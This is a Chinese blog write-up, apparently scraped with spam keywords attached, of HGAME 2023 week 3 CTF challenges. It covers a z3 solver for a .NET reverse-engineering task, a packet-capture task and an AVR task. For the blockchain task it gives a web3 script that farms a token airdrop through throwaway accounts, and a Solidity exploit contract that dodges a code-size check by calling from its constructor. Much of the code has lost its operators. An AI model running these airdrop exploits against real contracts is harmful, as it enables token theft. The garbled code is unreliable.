东莞做一个企业网站,国内快速建站,免费ppt模板下载公众号,网站修改关键词hgame2023-week3
过年 打麻将 摆烂
Reverse
kunmusic
.net逆向 ILSpy
发现奇怪的data
binwalk 发现一共有13个音频
根据逆向发现 过年鸡 对应最后一个音频
动调提取data 是一个.net的dll 再反编译 z3 求解
如果直接求解 会发现num内的值不正确
后面发现应该是BitVect…hgame2023-week3
过年 打麻将 摆烂
Reverse
kunmusic
.net逆向 ILSpy
发现奇怪的data
binwalk 发现一共有13个音频
根据逆向发现 过年鸡 对应最后一个音频
动调提取data 是一个.net的dll 再反编译 z3 求解
如果直接求解 会发现num内的值不正确
后面发现应该是BitVect精度不够 32bit时一半左右是正确的
后面干脆利用flag头逆推一下 在z3求解
from z3 import *bits 8num0 236
num1 72
num2 213
num3 106
num4 189
num5 86
num6 BitVec(num[6],bits)
num7 BitVec(num[7],bits)
num8 BitVec(num[8],bits)
num9 BitVec(num[9],bits)
num10 BitVec(num[10],bits)
num11 BitVec(num[11],bits)
num12 BitVec(num[12],bits)
s Solver()
s.add(num0 52296 num1 - 26211 num2 - 11754 (num3 ^ 41236) num4 * 63747 num5 - 52714 num6 - 10512 num7 * 12972 num8 45505 num9 - 21713 num10 - 59122 num11 - 12840 (num12 ^ 21087) 12702282)
s.add(num0 - 25228 (num1 ^ 20699) (num2 ^ 8158) num3 - 65307 num4 * 30701 num5 * 47555 num6 - 2557 (num7 ^ 49055) num8 - 7992 (num9 ^ 57465) (num10 ^ 57426) num11 13299 num12 - 50966 9946829)
s.add(num0 - 64801 num1 - 60698 num2 - 40853 num3 - 54907 num4 29882 (num5 ^ 13574) (num6 ^ 21310) num7 47366 num8 41784 (num9 ^ 53690) num10 * 58436 num11 * 15590 num12 58225 2372055)
s.add(num0 61538 num1 - 17121 num2 - 58124 num3 8186 num4 21253 num5 - 38524 num6 - 48323 num7 - 20556 num8 * 56056 num9 18568 num10 12995 (num11 ^ 39260) num12 25329 6732474)
s.add(num0 - 42567 num1 - 17743 num2 * 47827 num3 - 10246 (num4 ^ 16284) num5 39390 num6 * 11803 num7 * 60332 (num8 ^ 18491) (num9 ^ 4795) num10 - 25636 num11 - 16780 num12 - 62345 14020739)
s.add(num0 - 10968 num1 - 31780 (num2 ^ 31857) num3 - 61983 num4 * 31048 num5 * 20189 num6 12337 num7 * 25945 (num8 ^ 7064) num9 - 25369 num10 - 54893 num11 * 59949 (num12 ^ 12441) 14434062)
s.add(num0 16689 num1 - 10279 num2 - 32918 num3 - 57155 num4 * 26571 num5 * 15086 (num6 ^ 22986) (num7 ^ 23349) (num8 ^ 16381) (num9 ^ 23173) num10 - 40224 num11 31751 num12 * 8421 7433598)
s.add(num0 28740 num1 - 64696 num2 60470 num3 - 14752 (num4 ^ 1287) (num5 ^ 35272) num6 49467 num7 - 33788 num8 20606 (num9 ^ 44874) num10 * 19764 num11 48342 num12 * 56511 7989404)
s.add((num0 ^ 28978) num1 23120 num2 22802 num3 * 31533 (num4 ^ 39287) num5 - 48576 (num6 ^ 28542) num7 - 43265 num8 22365 num9 61108 num10 * 2823 num11 - 30343 num12 14780 3504803)
s.add(num0 * 22466 (num1 ^ 55999) num2 - 53658 (num3 ^ 47160) (num4 ^ 12511) num5 * 59807 num6 46242 num7 3052 (num8 ^ 25279) num9 30202 num10 * 22698 num11 33480 (num12 ^ 16757) 11003580)
s.add(num0 * 57492 (num1 ^ 13421) num2 - 13941 (num3 ^ 48092) num4 * 38310 num5 9884 num6 - 45500 num7 - 19233 num8 58274 num9 36175 (num10 ^ 18568) num11 * 49694 (num12 ^ 9473) 25546210)
s.add(num0 - 23355 num1 * 50164 (num2 ^ 34618) num3 52703 num4 36245 num5 * 46648 (num6 ^ 4858) (num7 ^ 41846) num8 * 27122 (num9 ^ 42058) num10 * 15676 num11 - 31863 num12 62510 11333836)
s.add(num0 * 30523 (num1 ^ 7990) num2 39058 num3 * 57549 (num4 ^ 53440) num5 * 4275 num6 - 48863 (num7 ^ 55436) (num8 ^ 2624) (num9 ^ 13652) num10 62231 num11 19456 num12 - 13195 13863722)if s.check() sat:m s.model()print(m)import stringdata [132, 47, 180, 7, 216, 45, 68, 6, 39, 246, 124, 2, 243, 137, 58, 172, 53, 200, 99, 91, 83, 13, 171,80, 108, 235, 179, 58, 176, 28, 216, 36, 11, 80, 39, 162, 97, 58, 236, 130, 123, 176, 24, 212, 56, 89, 72]dec hgame{num [i for i in range(13)]for i,j in enumerate(dec):num[i] ord(j)^data[i]num[9] 199
num[8] 120
num[7] 53
num[12] 133
num[11] 93
num[6] 62
num[10] 15
flagfor i,j in enumerate(data):flag chr(j^num[i%len(num)])
print(flag)Misc
Tunnel
题有问题
wiresharks 导出对象
直接搜索hgame就出了
关于 Tunnel Revange
没法跟安全协议的老师交代了 呜呜呜 ipesc最重要的东西
IoT
another UNO 非预期
先是逆向了一下
基于纯软件环境的AVR逆向分析-安全客 - 安全资讯平台 (anquanke.com)
发现有一堆异或
仿真时发现 前几个不定时出现flag头 干脆异或爆破一下 3*7个字符
BlockChain
VidarToken 非预期
就是硬转账了
import requests
from time import sleep
from eth_account import Account
from web3 import Web3
import jsonweb3 Web3(Web3.HTTPProvider(http://week-3.hgame.lwsec.cn:30332/))
recAccPk
recAcc Account.privateKeyToAccount(recAccPk)
recAccAddr recAcc.address
contractAddr with open(VidarToken_sol_VidarToken.abi, r) as f:abi json.load(f)
contract web3.eth.contract(addresscontractAddr, abiabi)def getNewAccount():account Account.create()address account.addressurl http://week-3.hgame.lwsec.cn:32228/api/claimreq requests.post(url, {address: address})while Txhash not in req.text:req requests.post(url, {address: address})sleep(1)return accountdef airdopTransfer():account getNewAccount()sleep(30)tx contract.functions.airdrop().buildTransaction({gas: 100000,gasPrice: web3.toWei(100, gwei),from: account.address,nonce: web3.eth.getTransactionCount(account.address)})signed account.signTransaction(tx)tx_id web3.eth.sendRawTransaction(signed.rawTransaction)web3.eth.waitForTransactionReceipt(tx_id)tx contract.functions.transfer(recAccAddr,10).buildTransaction({gas: 100000,gasPrice: web3.toWei(100, gwei),from: account.address,nonce: web3.eth.getTransactionCount(account.address)})signed account.signTransaction(tx)tx_id web3.eth.sendRawTransaction(signed.rawTransaction)web3.eth.waitForTransactionReceipt(tx_id)def balanceOf(addr):return contract.functions.balanceOf(addr).call()def solve():tx contract.functions.solve().buildTransaction({gas: 100000,gasPrice: web3.toWei(100, gwei),from: recAcc.address,nonce: web3.eth.getTransactionCount(recAcc.address)})signed recAcc.signTransaction(tx)tx_id web3.eth.sendRawTransaction(signed.rawTransaction)tx_receipt web3.eth.waitForTransactionReceipt(tx_id)print(tx_receipt)def main():for i in range(60):print(i)airdopTransfer()if int(balanceOf(recAccAddr)) 600:solve()if __name__ __main__:main()
预期解 应该是使用构造中的合约大小为0
一直有问题 等官方wp出来再看看吧
看了官方wp 跟我的差不多
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.0;import ./VidarToken.sol;contract Exploit {constructor() payable {VidarToken vidarToken VidarToken(0x5ad4Be93227D9a5E575d8084E42f4fD15df64813);vidarToken.airdrop();vidarToken.transfer(0x28A8AF0355457d4a460334014E24Fb5cD8B55343,10);}
}contract Runner {function exp() public{for (uint i0;i60;i){new Exploit();}}
} 后面发现是metamask的账户确认交易问题 一直卡在等待交易估计是私链的算力不够吧
重置账户交易信息就好了 2023-2-1
算是此时的感想吧hgame的题难度越来越大了考点也越来越好 每年玩hgame都能学到过去的一整年中不少好的考点 祝Vidar越来越强
week2截至时 我的总榜排名是第十名 week3截至时 我的总榜排名是第十三名 看来拿奖 是够呛了。。。呜呜呜 截至此篇发文时 IoT 方向 ak week4还没出 Blockchain 方向 ak week4 已经解除一道 但不知道是否追加题目 我知道我自己几斤几两 能ak的原因是 题目并不难或者条件受限
最后感谢Vidar成员的出题与付出
